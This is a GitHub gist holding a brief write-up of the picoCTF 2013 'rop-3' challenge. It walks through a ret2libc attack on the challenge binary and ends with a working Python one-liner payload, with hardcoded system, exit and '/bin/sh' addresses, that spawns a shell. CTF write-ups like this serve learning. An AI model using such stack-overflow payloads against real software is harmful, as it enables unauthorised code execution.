spnow/README.md

Forked from plvhx/README.md

Created December 22, 2016 12:48

Star (1) You must be signed in to star a gist
Fork (0) You must be signed in to fork a gist

Learn more about clone URLs
Clone this repository at <script src="https://gist.github.com/spnow/07c0e867bf5a5518d7a8360ac23e59cf.js"></script>
Save spnow/07c0e867bf5a5518d7a8360ac23e59cf to your computer and use it in GitHub Desktop.

Download ZIP

picoCTF 2013 rop-3 re-writeup

Raw

README.md

very trivial though.. :v

(1) junk buffer is 0x80 + 12
(2) find address of libc_system in gdb
(3) find address of libc_exit in gdb
(4) find '/bin/sh' string in gdb (find &system,+9999999,"/bin/sh")
(5) pwned!

since NX-shit is disabled, do a standard 'ret2libc' attack against that contrived binary. payload construction below:

["\x41"*(0x80 + 12)] + [libc_system] + [libc_exit] + ['/bin/sh'] = pwned!

(python -c 'import sys,struct;sys.stdout.write("\x41"*(0x80 + 12) + struct.pack("<I", 0x40067170) + struct.pack("<I", 0x4005cfc0) + struct.pack("<I", 0x40186be3))'; cat -) | ./rop3-7f3312fe43c46d26

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment